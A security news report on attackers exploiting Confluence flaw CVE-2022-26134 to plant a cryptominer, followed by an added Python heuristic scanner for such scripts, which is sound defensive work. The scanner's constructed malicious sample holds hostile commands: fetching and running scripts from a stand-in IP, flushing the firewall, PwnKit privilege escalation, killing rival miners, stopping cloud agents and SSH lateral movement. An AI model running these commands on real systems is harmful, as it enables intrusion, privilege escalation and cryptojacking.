A now-patched critical security flaw affecting Atlassian Confluence Server that was disclosed a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.
“If not patched and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as complete domain takeover of infrastructure and deployment of information stealers, remote access Trojans (RATs), and ransomware,” Trend Micro threat researcher Sunil Bharti said in a report.
The issue, tracked as CVE-2022-26134 (CVSS score: 9.8), was addressed by the Australian software company in June 2022.
In one of the infection chains observed by the cybersecurity firm, the flaw was exploited to download and execute a shell script (“ro.sh”) on the victim’s machine, which in turn retrieved a second shell script (“ap.sh”).
The malicious code is designed to update the PATH variable to include additional directories such as “/tmp”, download the cURL utility from a remote server if it is not already present, disable the iptables firewall, abuse the PwnKit flaw (CVE-2021-4034) to gain root privileges, and ultimately deploy the hezb crypto-miner.
Like other cryptojacking attacks, the shell script also terminates competing coin miners and disables the agents of cloud service providers Alibaba and Tencent before attempting lateral movement via SSH.
Lacework’s analysis further shows that the command-and-control (C2) server used to fetch the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named “kik” that allows the malware to kill processes of interest.
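The post-exploitation behaviours described above (PATH tampering, fetching tooling into a temp directory, disabling iptables, PwnKit abuse, killing rival miners, stopping cloud agents, SSH fan-out) are the kind of thing a defender can triage quickly from a dropped script or a captured command line. The heuristic scanner below is an added example written for this page, not code from Trend Micro, Lacework or the malware itself. Every regex, weight, hostname, and the two sample scripts are constructed assumptions that approximate the behaviours the report describes; they are not extracted indicators from ro.sh or ap.sh, and the agent names (AliYunDun, YDService and friends) and miner names (xmrig, kinsing) are assumed examples of what such a script typically targets.

```python
"""
Heuristic scanner for cryptojacker-style shell scripts.

Added illustration for this article; patterns, weights and sample
scripts are constructed assumptions, not real IOCs from ro.sh/ap.sh.
"""
import re
from typing import Dict, List, Tuple

# (indicator name, regex applied per line, arbitrary weight for ranking)
INDICATORS: List[Tuple[str, re.Pattern, int]] = [
    # PATH extended with a world-writable directory such as /tmp
    ("path_tampering",
     re.compile(r"\bexport\s+PATH=.*(/tmp|/dev/shm|/var/tmp)"), 2),
    # curl/wget pulling something from a URL into a temp directory
    ("tool_download",
     re.compile(r"\b(curl|wget)\b(?=.*https?://)(?=.*/(?:tmp|dev/shm|var/tmp)/)"), 2),
    # host firewall flushed or stopped
    ("firewall_disable",
     re.compile(r"\b(iptables\s+-F|ufw\s+disable|"
                r"(?:systemctl|service)\s+(?:stop|disable)\s+(?:iptables|firewalld))\b"), 3),
    # PwnKit (CVE-2021-4034) abuse via pkexec; assumed naming patterns
    ("pwnkit_pkexec",
     re.compile(r"\bpkexec\b|CVE-2021-4034|pwnkit", re.IGNORECASE), 4),
    # competing miners being killed; assumed miner process names
    ("kill_competitors",
     re.compile(r"\b(pkill|killall)\b.*\b(xmrig|kinsing|kdevtmpfsi|minerd)\b", re.IGNORECASE), 3),
    # Alibaba / Tencent cloud agents being stopped; assumed service names
    ("cloud_agent_tampering",
     re.compile(r"\b(AliYunDun|aliyun-service|aegis|YDService|barad_agent|sgagent)\b"), 3),
    # SSH used non-interactively against discovered hosts
    ("ssh_lateral",
     re.compile(r"\bssh\b.*StrictHostKeyChecking=no"), 3),
]


def scan_script(script: str) -> Dict[str, List[str]]:
    """Return {indicator: [matching lines]} for every indicator that fires."""
    hits: Dict[str, List[str]] = {}
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # skip blanks and comments
            continue
        for name, pattern, _weight in INDICATORS:
            if pattern.search(line):
                hits.setdefault(name, []).append(line)
    return hits


def risk_score(hits: Dict[str, List[str]]) -> int:
    """Sum the weight of each distinct indicator (not of each matching line)."""
    weights = {name: weight for name, _, weight in INDICATORS}
    return sum(weights[name] for name in hits)


def verdict(script: str, threshold: int = 6):
    """Classify a script; threshold is an assumed tuning value."""
    hits = scan_script(script)
    score = risk_score(hits)
    label = "cryptojacker-like" if score >= threshold else "benign-looking"
    return label, score, hits


# Constructed sample loosely modelled on the behaviour the report describes.
# The IP is from the documentation range and the binary names are made up.
SAMPLE_SCRIPT = """\
#!/bin/sh
# constructed sample, not the real ro.sh/ap.sh
export PATH=$PATH:/tmp:/usr/local/bin
command -v curl >/dev/null || wget -q http://198.51.100.7/curl -O /tmp/curl
/tmp/curl -fsSL http://198.51.100.7/ap.sh -o /tmp/ap.sh
iptables -F
[ "$(id -u)" != "0" ] && /tmp/pwnkit
pkill -9 -f xmrig; pkill -9 -f kinsing
systemctl stop aliyun-service 2>/dev/null
/etc/init.d/YDService stop 2>/dev/null
for h in $(awk '{print $1}' ~/.ssh/known_hosts); do ssh -oStrictHostKeyChecking=no "$h" 'id'; done
"""

# Constructed benign deployment script: same tools, none of the tells.
BENIGN_SCRIPT = """\
#!/bin/sh
export PATH=$PATH:/usr/local/bin
curl -fsSL https://example.com/release.tar.gz -o /opt/app/release.tar.gz
systemctl restart nginx
"""

if __name__ == "__main__":
    for title, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        label, score, hits = verdict(script)
        print(f"{title}: {label} (score {score})")
        for name, lines in hits.items():
            print(f"  {name}: {lines[0]}")
```

The scanner scores distinct behaviours rather than matching lines, so a script that downloads several files still only earns the download weight once; what pushes a sample over the threshold is the combination of firewall disabling, privilege escalation and agent tampering, which ordinary deployment scripts do not exhibit. Run it over scripts recovered from /tmp, cron entries, or the command lines in your EDR telemetry, and tune the patterns and weights to your own environment.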
Users are advised to prioritize patching the flaw, as it could be exploited by malicious actors for other nefarious purposes.
“Attackers could take advantage of injecting their own code for interpretation and access to the targeted Confluence domain, as well as carrying out attacks ranging from controlling the server for subsequent malicious activity to damaging the infrastructure itself,” Bharti said.